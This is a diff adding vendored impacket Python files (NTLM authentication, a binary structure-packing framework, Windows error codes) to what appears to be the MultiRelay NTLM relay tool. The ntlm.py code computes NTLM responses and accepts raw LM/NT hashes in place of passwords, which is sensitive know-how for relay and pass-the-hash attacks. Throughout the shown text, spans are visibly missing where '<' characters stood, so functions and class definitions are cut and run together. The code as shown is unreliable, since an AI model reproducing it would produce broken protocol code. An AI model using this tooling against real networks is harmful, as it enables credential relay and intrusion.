+# If set, requests an identify level token. An alternate name for this field is NTLMSSP_NEGOTIATE_IDENTIFY
+NTLMSSP_NEGOTIATE_IDENTIFY = 0x00100000
+
+# If set, requests usage of the NTLM v2 session security. NTLM v2 session security is a misnomer because it is not
+# NTLM v2. It is NTLM v1 using the extended session security that is also in NTLM v2. NTLMSSP_NEGOTIATE_LM_KEY and
+# NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY are mutually exclusive. If both NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
+# and NTLMSSP_NEGOTIATE_LM_KEY are requested, NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY alone MUST be returned to the
+# client. NTLM v2 authentication session key generation MUST be supported by both the client and the DC in order to be
+# used, and extended session security signing and sealing requires support from the client and the server in order to
+# be used.<23> An alternate name for this field is NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
+NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000
+NTLMSSP_NEGOTIATE_NTLM2 = 0x00080000
+NTLMSSP_TARGET_TYPE_SHARE = 0x00040000
+
+# If set, TargetName MUST be a server name. The data corresponding to this flag is provided by the server in the
+# TargetName field of the CHALLENGE_MESSAGE. If this bit is set, then NTLMSSP_TARGET_TYPE_DOMAIN MUST NOT be set.
+# This flag MUST be ignored in the NEGOTIATE_MESSAGE and the AUTHENTICATE_MESSAGE. An alternate name for this field
+# is NTLMSSP_TARGET_TYPE_SERVER
+NTLMSSP_TARGET_TYPE_SERVER = 0x00020000
+
+# If set, TargetName MUST be a domain name. The data corresponding to this flag is provided by the server in the
+# TargetName field of the CHALLENGE_MESSAGE. If set, then NTLMSSP_TARGET_TYPE_SERVER MUST NOT be set. This flag MUST
+# be ignored in the NEGOTIATE_MESSAGE and the AUTHENTICATE_MESSAGE. An alternate name for this field is
+# NTLMSSP_TARGET_TYPE_DOMAIN.
+NTLMSSP_TARGET_TYPE_DOMAIN = 0x00010000
+
+# If set, requests the presence of a signature block on all messages. NTLMSSP_NEGOTIATE_ALWAYS_SIGN MUST be set in the
+# NEGOTIATE_MESSAGE to the server and the CHALLENGE_MESSAGE to the client. NTLMSSP_NEGOTIATE_ALWAYS_SIGN is overridden
+# by NTLMSSP_NEGOTIATE_SIGN and NTLMSSP_NEGOTIATE_SEAL, if they are supported. An alternate name for this field is
+# NTLMSSP_NEGOTIATE_ALWAYS_SIGN.
+NTLMSSP_NEGOTIATE_ALWAYS_SIGN = 0x00008000 # forces the other end to sign packets
+NTLMSSP_RESERVED_6 = 0x00004000
+
+# This flag indicates whether the Workstation field is present. If this flag is not set, the Workstation field MUST be
+# ignored. If this flag is set, the length field of the Workstation field specifies whether the workstation name is
+# nonempty or not.<24> An alternate name for this field is NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED.
+NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED = 0x00002000
+
+# If set, the domain name is provided (section 2.2.1.1).<25> An alternate name for this field is
+# NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED
+NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED = 0x00001000
+NTLMSSP_RESERVED_7 = 0x00000800
+
+
+# If set, LM authentication is not allowed and only NT authentication is used.
+NTLMSSP_NEGOTIATE_NT_ONLY = 0x00000400
+
+# If set, requests usage of the NTLM v1 session security protocol. NTLMSSP_NEGOTIATE_NTLM MUST be set in the
+# NEGOTIATE_MESSAGE to the server and the CHALLENGE_MESSAGE to the client. An alternate name for this field is
+# NTLMSSP_NEGOTIATE_NTLM
+NTLMSSP_NEGOTIATE_NTLM = 0x00000200
+NTLMSSP_RESERVED_8 = 0x00000100
+
+# If set, requests LAN Manager (LM) session key computation. NTLMSSP_NEGOTIATE_LM_KEY and
+# NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY are mutually exclusive. If both NTLMSSP_NEGOTIATE_LM_KEY and
+# NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY are requested, NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY alone MUST be
+# returned to the client. NTLM v2 authentication session key generation MUST be supported by both the client and the
+# DC in order to be used, and extended session security signing and sealing requires support from the client and the
+# server to be used. An alternate name for this field is NTLMSSP_NEGOTIATE_LM_KEY.
+NTLMSSP_NEGOTIATE_LM_KEY = 0x00000080
+
+# If set, requests connectionless authentication. If NTLMSSP_NEGOTIATE_DATAGRAM is set, then NTLMSSP_NEGOTIATE_KEY_EXCH
+# MUST always be set in the AUTHENTICATE_MESSAGE to the server and the CHALLENGE_MESSAGE to the client. An alternate
+# name for this field is NTLMSSP_NEGOTIATE_DATAGRAM.
+NTLMSSP_NEGOTIATE_DATAGRAM = 0x00000040
+
+# If set, requests session key negotiation for message confidentiality. If the client sends NTLMSSP_NEGOTIATE_SEAL to
+# the server in the NEGOTIATE_MESSAGE, the server MUST return NTLMSSP_NEGOTIATE_SEAL to the client in the
+# CHALLENGE_MESSAGE. Clients and servers that set NTLMSSP_NEGOTIATE_SEAL SHOULD always set NTLMSSP_NEGOTIATE_56 and
+# NTLMSSP_NEGOTIATE_128, if they are supported. An alternate name for this field is NTLMSSP_NEGOTIATE_SEAL.
+NTLMSSP_NEGOTIATE_SEAL = 0x00000020
+
+# If set, requests session key negotiation for message signatures. If the client sends NTLMSSP_NEGOTIATE_SIGN to the
+# server in the NEGOTIATE_MESSAGE, the server MUST return NTLMSSP_NEGOTIATE_SIGN to the client in the CHALLENGE_MESSAGE.
+# An alternate name for this field is NTLMSSP_NEGOTIATE_SIGN.
+NTLMSSP_NEGOTIATE_SIGN = 0x00000010 # means packet is signed, if verifier is wrong it fails
+NTLMSSP_RESERVED_9 = 0x00000008
+
+# If set, a TargetName field of the CHALLENGE_MESSAGE (section 2.2.1.2) MUST be supplied. An alternate name for this
+# field is NTLMSSP_REQUEST_TARGET.
+NTLMSSP_REQUEST_TARGET = 0x00000004
+
+# If set, requests OEM character set encoding. An alternate name for this field is NTLM_NEGOTIATE_OEM. See bit A for
+# details.
+NTLM_NEGOTIATE_OEM = 0x00000002
+
+# If set, requests Unicode character set encoding. An alternate name for this field is NTLMSSP_NEGOTIATE_UNICODE.
+NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
+
+# AV_PAIR constants
+NTLMSSP_AV_EOL = 0x00
+NTLMSSP_AV_HOSTNAME = 0x01
+NTLMSSP_AV_DOMAINNAME = 0x02
+NTLMSSP_AV_DNS_HOSTNAME = 0x03
+NTLMSSP_AV_DNS_DOMAINNAME = 0x04
+NTLMSSP_AV_DNS_TREENAME = 0x05
+NTLMSSP_AV_FLAGS = 0x06
+NTLMSSP_AV_TIME = 0x07
+NTLMSSP_AV_RESTRICTIONS = 0x08
+NTLMSSP_AV_TARGET_NAME = 0x09
+NTLMSSP_AV_CHANNEL_BINDINGS = 0x0a
+
+class AV_PAIRS:
+ def __init__(self, data = None):
+ self.fields = {}
+ if data is not None:
+ self.fromString(data)
+
+ def __setitem__(self,key,value):
+ self.fields[key] = (len(value),value)
+
+ def __getitem__(self, key):
+ if key in self.fields:
+ return self.fields[key]
+ return None
+
+ def __delitem__(self, key):
+ del self.fields[key]
+
+ def __len__(self):
+ return len(self.getData())
+
+ def __str__(self):
+ return len(self.getData())
+
+ def fromString(self, data):
+ tInfo = data
+ fType = 0xff
+ while fType is not NTLMSSP_AV_EOL:
+ fType = struct.unpack(' 0:
+ self['flags'] |= NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED
+ if len(self.fields['domain_name']) > 0:
+ self['flags'] |= NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED
+ version_len = len(self.fields['os_version'])
+ if version_len > 0:
+ self['flags'] |= NTLMSSP_NEGOTIATE_VERSION
+ elif self.__hasNegotiateVersion():
+ raise Exception('Must provide the os_version field if the NTLMSSP_NEGOTIATE_VERSION flag is set')
+ if (self['flags'] & NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED) == NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED:
+ self['host_offset']=32 + version_len
+ if (self['flags'] & NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED) == NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED:
+ self['domain_offset']=32+len(self['host_name']) + version_len
+ return Structure.getData(self)
+
+ def fromString(self,data):
+ Structure.fromString(self,data)
+
+ domain_offset = self['domain_offset']
+ domain_end = self['domain_len'] + domain_offset
+ self['domain_name'] = data[ domain_offset : domain_end ]
+
+ host_offset = self['host_offset']
+ host_end = self['host_len'] + host_offset
+ self['host_name'] = data[ host_offset : host_end ]
+
+ if len(data) >= 36 and self.__hasNegotiateVersion():
+ self['os_version'] = VERSION(data[32:])
+ else:
+ self['os_version'] = ''
+
+class NTLMAuthChallenge(Structure):
+
+ structure = (
+ ('','"NTLMSSP\x00'),
+ ('message_type','> 1) & 0x7f) << 1)
+ s.append(((key[0] & 0x01) << 6 | ((key[1] >> 2) & 0x3f)) << 1)
+ s.append(((key[1] & 0x03) << 5 | ((key[2] >> 3) & 0x1f)) << 1)
+ s.append(((key[2] & 0x07) << 4 | ((key[3] >> 4) & 0x0f)) << 1)
+ s.append(((key[3] & 0x0f) << 3 | ((key[4] >> 5) & 0x07)) << 1)
+ s.append(((key[4] & 0x1f) << 2 | ((key[5] >> 6) & 0x03)) << 1)
+ s.append(((key[5] & 0x3f) << 1 | ((key[6] >> 7) & 0x01)) << 1)
+ s.append((key[6] & 0x7f) << 1)
+ return bytes(s)
+
+def __DES_block(key, msg):
+ cipher = DES.new(__expand_DES_key(key),DES.MODE_ECB)
+ return cipher.encrypt(msg)
+
+def ntlmssp_DES_encrypt(key, challenge):
+ answer = __DES_block(key[:7], challenge)
+ answer += __DES_block(key[7:14], challenge)
+ answer += __DES_block(key[14:], challenge)
+ return answer
+
+# High level functions to use NTLMSSP
+
+def getNTLMSSPType1(workstation='', domain='', signingRequired = False, use_ntlmv2 = USE_NTLMv2):
+ # Let's do some encoding checks before moving on. Kind of dirty, but found effective when dealing with
+ # international characters.
+ import sys
+ encoding = sys.getfilesystemencoding()
+ if encoding is not None:
+ try:
+ workstation.encode('utf-16le')
+ except:
+ workstation = workstation.decode(encoding)
+ try:
+ domain.encode('utf-16le')
+ except:
+ domain = domain.decode(encoding)
+
+ # Let's prepare a Type 1 NTLMSSP Message
+ auth = NTLMAuthNegotiate()
+ auth['flags']=0
+ if signingRequired:
+ auth['flags'] = NTLMSSP_NEGOTIATE_KEY_EXCH | NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_ALWAYS_SIGN | \
+ NTLMSSP_NEGOTIATE_SEAL
+ if use_ntlmv2:
+ auth['flags'] |= NTLMSSP_NEGOTIATE_TARGET_INFO
+ auth['flags'] |= NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY | NTLMSSP_NEGOTIATE_UNICODE | \
+ NTLMSSP_REQUEST_TARGET | NTLMSSP_NEGOTIATE_128 | NTLMSSP_NEGOTIATE_56
+
+ # We're not adding workstation / domain fields this time. Normally Windows clients don't add such information but,
+ # we will save the workstation name to be used later.
+ auth.setWorkstation(workstation)
+
+ return auth
+
+def getNTLMSSPType3(type1, type2, user, password, domain, lmhash = '', nthash = '', use_ntlmv2 = USE_NTLMv2):
+
+ # Safety check in case somebody sent password = None.. That's not allowed. Setting it to '' and hope for the best.
+ if password is None:
+ password = ''
+
+ # Let's do some encoding checks before moving on. Kind of dirty, but found effective when dealing with
+ # international characters.
+ import sys
+ encoding = sys.getfilesystemencoding()
+ if encoding is not None:
+ try:
+ user.encode('utf-16le')
+ except:
+ user = user.decode(encoding)
+ try:
+ password.encode('utf-16le')
+ except:
+ password = password.decode(encoding)
+ try:
+ domain.encode('utf-16le')
+ except:
+ domain = user.decode(encoding)
+
+ ntlmChallenge = NTLMAuthChallenge(type2)
+
+ # Let's start with the original flags sent in the type1 message
+ responseFlags = type1['flags']
+
+ # Token received and parsed. Depending on the authentication
+ # method we will create a valid ChallengeResponse
+ ntlmChallengeResponse = NTLMAuthChallengeResponse(user, password, ntlmChallenge['challenge'])
+
+ clientChallenge = b("".join([random.choice(string.digits+string.ascii_letters) for _ in range(8)]))
+
+ serverName = ntlmChallenge['TargetInfoFields']
+
+ ntResponse, lmResponse, sessionBaseKey = computeResponse(ntlmChallenge['flags'], ntlmChallenge['challenge'],
+ clientChallenge, serverName, domain, user, password,
+ lmhash, nthash, use_ntlmv2)
+
+ # Let's check the return flags
+ if (ntlmChallenge['flags'] & NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY) == 0:
+ # No extended session security, taking it out
+ responseFlags &= 0xffffffff ^ NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
+ if (ntlmChallenge['flags'] & NTLMSSP_NEGOTIATE_128 ) == 0:
+ # No support for 128 key len, taking it out
+ responseFlags &= 0xffffffff ^ NTLMSSP_NEGOTIATE_128
+ if (ntlmChallenge['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH) == 0:
+ # No key exchange supported, taking it out
+ responseFlags &= 0xffffffff ^ NTLMSSP_NEGOTIATE_KEY_EXCH
+ if (ntlmChallenge['flags'] & NTLMSSP_NEGOTIATE_SEAL) == 0:
+ # No sign available, taking it out
+ responseFlags &= 0xffffffff ^ NTLMSSP_NEGOTIATE_SEAL
+ if (ntlmChallenge['flags'] & NTLMSSP_NEGOTIATE_SIGN) == 0:
+ # No sign available, taking it out
+ responseFlags &= 0xffffffff ^ NTLMSSP_NEGOTIATE_SIGN
+ if (ntlmChallenge['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN) == 0:
+ # No sign available, taking it out
+ responseFlags &= 0xffffffff ^ NTLMSSP_NEGOTIATE_ALWAYS_SIGN
+
+ keyExchangeKey = KXKEY(ntlmChallenge['flags'], sessionBaseKey, lmResponse, ntlmChallenge['challenge'], password,
+ lmhash, nthash, use_ntlmv2)
+
+ # Special case for anonymous login
+ if user == '' and password == '' and lmhash == '' and nthash == '':
+ keyExchangeKey = b'\x00'*16
+
+ # If we set up key exchange, let's fill the right variables
+ if ntlmChallenge['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH:
+ # not exactly what I call random tho :\
+ # exportedSessionKey = this is the key we should use to sign
+ exportedSessionKey = b("".join([random.choice(string.digits+string.ascii_letters) for _ in range(16)]))
+ #exportedSessionKey = "A"*16
+ #print "keyExchangeKey %r" % keyExchangeKey
+ # Let's generate the right session key based on the challenge flags
+ #if responseFlags & NTLMSSP_NTLM2_KEY:
+ # Extended session security enabled
+ # if responseFlags & NTLMSSP_KEY_128:
+ # Full key
+ # exportedSessionKey = exportedSessionKey
+ # elif responseFlags & NTLMSSP_KEY_56:
+ # Only 56-bit key
+ # exportedSessionKey = exportedSessionKey[:7]
+ # else:
+ # exportedSessionKey = exportedSessionKey[:5]
+ #elif responseFlags & NTLMSSP_KEY_56:
+ # No extended session security, just 56 bits key
+ # exportedSessionKey = exportedSessionKey[:7] + '\xa0'
+ #else:
+ # exportedSessionKey = exportedSessionKey[:5] + '\xe5\x38\xb0'
+
+ encryptedRandomSessionKey = generateEncryptedSessionKey(keyExchangeKey, exportedSessionKey)
+ else:
+ encryptedRandomSessionKey = None
+ # [MS-NLMP] page 46
+ exportedSessionKey = keyExchangeKey
+
+ ntlmChallengeResponse['flags'] = responseFlags
+ ntlmChallengeResponse['domain_name'] = domain.encode('utf-16le')
+ ntlmChallengeResponse['host_name'] = type1.getWorkstation().encode('utf-16le')
+ if lmResponse == '':
+ ntlmChallengeResponse['lanman'] = b'\x00'
+ else:
+ ntlmChallengeResponse['lanman'] = lmResponse
+ ntlmChallengeResponse['ntlm'] = ntResponse
+ if encryptedRandomSessionKey is not None:
+ ntlmChallengeResponse['session_key'] = encryptedRandomSessionKey
+
+ return ntlmChallengeResponse, exportedSessionKey
+
+
+# NTLMv1 Algorithm
+
+def generateSessionKeyV1(password, lmhash, nthash):
+ hash = MD4.new()
+ hash.update(NTOWFv1(password, lmhash, nthash))
+ return hash.digest()
+
+
+def computeResponseNTLMv1(flags, serverChallenge, clientChallenge, serverName, domain, user, password, lmhash='',
+ nthash='', use_ntlmv2=USE_NTLMv2):
+ if user == '' and password == '':
+ # Special case for anonymous authentication
+ lmResponse = ''
+ ntResponse = ''
+ else:
+ lmhash = LMOWFv1(password, lmhash, nthash)
+ nthash = NTOWFv1(password, lmhash, nthash)
+ if flags & NTLMSSP_NEGOTIATE_LM_KEY:
+ ntResponse = ''
+ lmResponse = get_ntlmv1_response(lmhash, serverChallenge)
+ elif flags & NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:
+ md5 = hashlib.new('md5')
+ chall = (serverChallenge + clientChallenge)
+ md5.update(chall)
+ ntResponse = ntlmssp_DES_encrypt(nthash, md5.digest()[:8])
+ lmResponse = clientChallenge + b'\x00'*16
+ else:
+ ntResponse = get_ntlmv1_response(nthash,serverChallenge)
+ lmResponse = get_ntlmv1_response(lmhash, serverChallenge)
+
+ sessionBaseKey = generateSessionKeyV1(password, lmhash, nthash)
+ return ntResponse, lmResponse, sessionBaseKey
+
+def compute_lmhash(password):
+ # This is done according to Samba's encryption specification (docs/html/ENCRYPTION.html)
+ password = password.upper()
+ lmhash = __DES_block(b(password[:7]), KNOWN_DES_INPUT)
+ lmhash += __DES_block(b(password[7:14]), KNOWN_DES_INPUT)
+ return lmhash
+
+def NTOWFv1(password, lmhash = '', nthash=''):
+ if nthash != '':
+ return nthash
+ return compute_nthash(password)
+
+def LMOWFv1(password, lmhash = '', nthash=''):
+ if lmhash != '':
+ return lmhash
+ return compute_lmhash(password)
+
+def compute_nthash(password):
+ # This is done according to Samba's encryption specification (docs/html/ENCRYPTION.html)
+ try:
+ password = str(password).encode('utf_16le')
+ except UnicodeDecodeError:
+ import sys
+ password = password.decode(sys.getfilesystemencoding()).encode('utf_16le')
+
+ hash = MD4.new()
+ hash.update(password)
+ return hash.digest()
+
+def get_ntlmv1_response(key, challenge):
+ return ntlmssp_DES_encrypt(key, challenge)
+
+# NTLMv2 Algorithm - as described in MS-NLMP Section 3.3.2
+
+# Crypto Stuff
+
+def MAC(flags, handle, signingKey, seqNum, message):
+ # [MS-NLMP] Section 3.4.4
+ # Returns the right messageSignature depending on the flags
+ messageSignature = NTLMMessageSignature(flags)
+ if flags & NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:
+ if flags & NTLMSSP_NEGOTIATE_KEY_EXCH:
+ messageSignature['Version'] = 1
+ messageSignature['Checksum'] = \
+ struct.unpack(' Local Policies -> Security Options -> Server SPN target name validation
+ # level
+ if TEST_CASE is False:
+ av_pairs[NTLMSSP_AV_TARGET_NAME] = 'cifs/'.encode('utf-16le') + av_pairs[NTLMSSP_AV_HOSTNAME][1]
+ if av_pairs[NTLMSSP_AV_TIME] is not None:
+ aTime = av_pairs[NTLMSSP_AV_TIME][1]
+ else:
+ aTime = struct.pack(' [big endian]
+
+ usual printf like specifiers can be used (if started with %)
+ [not recommended, there is no way to unpack this]
+
+ %08x will output an 8 bytes hex
+ %s will output a string
+ %s\\x00 will output a NUL terminated string
+ %d%d will output 2 decimal digits (against the very same specification of Structure)
+ ...
+
+ some additional format specifiers:
+ : just copy the bytes from the field into the output string (input may be string, other structure, or anything responding to __str__()) (for unpacking, all what's left is returned)
+ z same as :, but adds a NUL byte at the end (asciiz) (for unpacking the first NUL byte is used as terminator) [asciiz string]
+ u same as z, but adds two NUL bytes at the end (after padding to an even size with NULs). (same for unpacking) [unicode string]
+ w DCE-RPC/NDR string (it's a macro for [ ' 2:
+ dataClassOrCode = field[2]
+ try:
+ self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0])
+ except Exception as e:
+ e.args += ("When unpacking field '%s | %s | %r[:%d]'" % (field[0], field[1], data, size),)
+ raise
+
+ size = self.calcPackSize(field[1], self[field[0]], field[0])
+ if self.alignment and size % self.alignment:
+ size += self.alignment - (size % self.alignment)
+ data = data[size:]
+
+ return self
+
+ def __setitem__(self, key, value):
+ self.fields[key] = value
+ self.data = None # force recompute
+
+ def __getitem__(self, key):
+ return self.fields[key]
+
+ def __delitem__(self, key):
+ del self.fields[key]
+
+ def __str__(self):
+ return self.getData()
+
+ def __len__(self):
+ # XXX: improve
+ return len(self.getData())
+
+ def pack(self, format, data, field = None):
+ if self.debug:
+ print(" pack( %s | %r | %s)" % (format, data, field))
+
+ if field:
+ addressField = self.findAddressFieldFor(field)
+ if (addressField is not None) and (data is None):
+ return b''
+
+ # void specifier
+ if format[:1] == '_':
+ return b''
+
+ # quote specifier
+ if format[:1] == "'" or format[:1] == '"':
+ return b(format[1:])
+
+ # code specifier
+ two = format.split('=')
+ if len(two) >= 2:
+ try:
+ return self.pack(two[0], data)
+ except:
+ fields = {'self':self}
+ fields.update(self.fields)
+ return self.pack(two[0], eval(two[1], {}, fields))
+
+ # address specifier
+ two = format.split('&')
+ if len(two) == 2:
+ try:
+ return self.pack(two[0], data)
+ except:
+ if (two[1] in self.fields) and (self[two[1]] is not None):
+ return self.pack(two[0], id(self[two[1]]) & ((1<<(calcsize(two[0])*8))-1) )
+ else:
+ return self.pack(two[0], 0)
+
+ # length specifier
+ two = format.split('-')
+ if len(two) == 2:
+ try:
+ return self.pack(two[0],data)
+ except:
+ return self.pack(two[0], self.calcPackFieldSize(two[1]))
+
+ # array specifier
+ two = format.split('*')
+ if len(two) == 2:
+ answer = bytes()
+ for each in data:
+ answer += self.pack(two[1], each)
+ if two[0]:
+ if two[0].isdigit():
+ if int(two[0]) != len(data):
+ raise Exception("Array field has a constant size, and it doesn't match the actual value")
+ else:
+ return self.pack(two[0], len(data))+answer
+ return answer
+
+ # "printf" string specifier
+ if format[:1] == '%':
+ # format string like specifier
+ return b(format % data)
+
+ # asciiz specifier
+ if format[:1] == 'z':
+ if isinstance(data,bytes):
+ return data + b('\0')
+ return bytes(b(data)+b('\0'))
+
+ # unicode specifier
+ if format[:1] == 'u':
+ return bytes(data+b('\0\0') + (len(data) & 1 and b('\0') or b''))
+
+ # DCE-RPC/NDR string specifier
+ if format[:1] == 'w':
+ if len(data) == 0:
+ data = b('\0\0')
+ elif len(data) % 2:
+ data = b(data) + b('\0')
+ l = pack('= 2:
+ return self.unpack(two[0],data)
+
+ # length specifier
+ two = format.split('-')
+ if len(two) == 2:
+ return self.unpack(two[0],data)
+
+ # array specifier
+ two = format.split('*')
+ if len(two) == 2:
+ answer = []
+ sofar = 0
+ if two[0].isdigit():
+ number = int(two[0])
+ elif two[0]:
+ sofar += self.calcUnpackSize(two[0], data)
+ number = self.unpack(two[0], data[:sofar])
+ else:
+ number = -1
+
+ while number and sofar < len(data):
+ nsofar = sofar + self.calcUnpackSize(two[1],data[sofar:])
+ answer.append(self.unpack(two[1], data[sofar:nsofar], dataClassOrCode))
+ number -= 1
+ sofar = nsofar
+ return answer
+
+ # "printf" string specifier
+ if format[:1] == '%':
+ # format string like specifier
+ return format % data
+
+ # asciiz specifier
+ if format == 'z':
+ if data[-1:] != b('\x00'):
+ raise Exception("%s 'z' field is not NUL terminated: %r" % (field, data))
+ if PY3:
+ return data[:-1].decode('latin-1')
+ else:
+ return data[:-1]
+
+ # unicode specifier
+ if format == 'u':
+ if data[-2:] != b('\x00\x00'):
+ raise Exception("%s 'u' field is not NUL-NUL terminated: %r" % (field, data))
+ return data[:-2] # remove trailing NUL
+
+ # DCE-RPC/NDR string specifier
+ if format == 'w':
+ l = unpack('= 2:
+ return self.calcPackSize(two[0], data)
+
+ # length specifier
+ two = format.split('-')
+ if len(two) == 2:
+ return self.calcPackSize(two[0], data)
+
+ # array specifier
+ two = format.split('*')
+ if len(two) == 2:
+ answer = 0
+ if two[0].isdigit():
+ if int(two[0]) != len(data):
+ raise Exception("Array field has a constant size, and it doesn't match the actual value")
+ elif two[0]:
+ answer += self.calcPackSize(two[0], len(data))
+
+ for each in data:
+ answer += self.calcPackSize(two[1], each)
+ return answer
+
+ # "printf" string specifier
+ if format[:1] == '%':
+ # format string like specifier
+ return len(format % data)
+
+ # asciiz specifier
+ if format[:1] == 'z':
+ return len(data)+1
+
+ # asciiz specifier
+ if format[:1] == 'u':
+ l = len(data)
+ return l + (l & 1 and 3 or 2)
+
+ # DCE-RPC/NDR string specifier
+ if format[:1] == 'w':
+ l = len(data)
+ return 12+l+l % 2
+
+ # literal specifier
+ if format[:1] == ':':
+ return len(data)
+
+ # struct like specifier
+ return calcsize(format)
+
+ def calcUnpackSize(self, format, data, field = None):
+ if self.debug:
+ print(" calcUnpackSize( %s | %s | %r)" % (field, format, data))
+
+ # void specifier
+ if format[:1] == '_':
+ return 0
+
+ addressField = self.findAddressFieldFor(field)
+ if addressField is not None:
+ if not self[addressField]:
+ return 0
+
+ try:
+ lengthField = self.findLengthFieldFor(field)
+ return int(self[lengthField])
+ except Exception:
+ pass
+
+ # XXX: Try to match to actual values, raise if no match
+
+ # quote specifier
+ if format[:1] == "'" or format[:1] == '"':
+ return len(format)-1
+
+ # address specifier
+ two = format.split('&')
+ if len(two) == 2:
+ return self.calcUnpackSize(two[0], data)
+
+ # code specifier
+ two = format.split('=')
+ if len(two) >= 2:
+ return self.calcUnpackSize(two[0], data)
+
+ # length specifier
+ two = format.split('-')
+ if len(two) == 2:
+ return self.calcUnpackSize(two[0], data)
+
+ # array specifier
+ two = format.split('*')
+ if len(two) == 2:
+ answer = 0
+ if two[0]:
+ if two[0].isdigit():
+ number = int(two[0])
+ else:
+ answer += self.calcUnpackSize(two[0], data)
+ number = self.unpack(two[0], data[:answer])
+
+ while number:
+ number -= 1
+ answer += self.calcUnpackSize(two[1], data[answer:])
+ else:
+ while answer < len(data):
+ answer += self.calcUnpackSize(two[1], data[answer:])
+ return answer
+
+ # "printf" string specifier
+ if format[:1] == '%':
+ raise Exception("Can't guess the size of a printf like specifier for unpacking")
+
+ # asciiz specifier
+ if format[:1] == 'z':
+ return data.index(b('\x00'))+1
+
+ # asciiz specifier
+ if format[:1] == 'u':
+ l = data.index(b('\x00\x00'))
+ return l + (l & 1 and 3 or 2)
+
+ # DCE-RPC/NDR string specifier
+ if format[:1] == 'w':
+ l = unpack('?@[\\]^_`{|}~ ':
+ return chr(x)
+ else:
+ return u'.'
+
+def hexdump(data, indent = ''):
+ if data is None:
+ return
+ if isinstance(data, int):
+ data = str(data).encode('utf-8')
+ x=bytearray(data)
+ strLen = len(x)
+ i = 0
+ while i < strLen:
+ line = " %s%04x " % (indent, i)
+ for j in range(16):
+ if i+j < strLen:
+ line += "%02X " % x[i+j]
+ else:
+ line += u" "
+ if j%16 == 7:
+ line += " "
+ line += " "
+ line += ''.join(pretty_print(x) for x in x[i:i+16] )
+ print (line)
+ i += 16
+
+def parse_bitmask(dict, value):
+ ret = ''
+
+ for i in range(0, 31):
+ flag = 1 << i
+
+ if value & flag == 0:
+ continue
+
+ if flag in dict:
+ ret += '%s | ' % dict[flag]
+ else:
+ ret += "0x%.8X | " % flag
+
+ if len(ret) == 0:
+ return '0'
+ else:
+ return ret[:-3]
diff --git a/tools/MultiRelay/impacket-dev/impacket/system_errors.py b/tools/MultiRelay/impacket-dev/impacket/system_errors.py
new file mode 100644
index 0000000..707f553
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/system_errors.py
@@ -0,0 +1,5521 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+# SYSTEM Errors from [MS-ERREF]. Ideally all the files
+# should grab the error codes from here
+#
+
+ERROR_MESSAGES = {
+ 0x00000000: ("ERROR_SUCCESS", "The operation completed successfully."),
+ 0x00000001: ("ERROR_INVALID_FUNCTION", "Incorrect function."),
+ 0x00000002: ("ERROR_FILE_NOT_FOUND", "The system cannot find the file specified."),
+ 0x00000003: ("ERROR_PATH_NOT_FOUND", "The system cannot find the path specified."),
+ 0x00000004: ("ERROR_TOO_MANY_OPEN_FILES", "The system cannot open the file."),
+ 0x00000005: ("ERROR_ACCESS_DENIED", "Access is denied."),
+ 0x00000006: ("ERROR_INVALID_HANDLE", "The handle is invalid."),
+ 0x00000007: ("ERROR_ARENA_TRASHED", "The storage control blocks were destroyed."),
+ 0x00000008: ("ERROR_NOT_ENOUGH_MEMORY", "Not enough storage is available to process this command."),
+ 0x00000009: ("ERROR_INVALID_BLOCK", "The storage control block address is invalid."),
+ 0x0000000a: ("ERROR_BAD_ENVIRONMENT", "The environment is incorrect."),
+ 0x0000000b: ("ERROR_BAD_FORMAT", "An attempt was made to load a program with an incorrect format."),
+ 0x0000000c: ("ERROR_INVALID_ACCESS", "The access code is invalid."),
+ 0x0000000d: ("ERROR_INVALID_DATA", "The data is invalid."),
+ 0x0000000e: ("ERROR_OUTOFMEMORY", "Not enough storage is available to complete this operation."),
+ 0x0000000f: ("ERROR_INVALID_DRIVE", "The system cannot find the drive specified."),
+ 0x00000010: ("ERROR_CURRENT_DIRECTORY", "The directory cannot be removed."),
+ 0x00000011: ("ERROR_NOT_SAME_DEVICE", "The system cannot move the file to a different disk drive."),
+ 0x00000012: ("ERROR_NO_MORE_FILES", "There are no more files."),
+ 0x00000013: ("ERROR_WRITE_PROTECT", "The media is write protected."),
+ 0x00000014: ("ERROR_BAD_UNIT", "The system cannot find the device specified."),
+ 0x00000015: ("ERROR_NOT_READY", "The device is not ready."),
+ 0x00000016: ("ERROR_BAD_COMMAND", "The device does not recognize the command."),
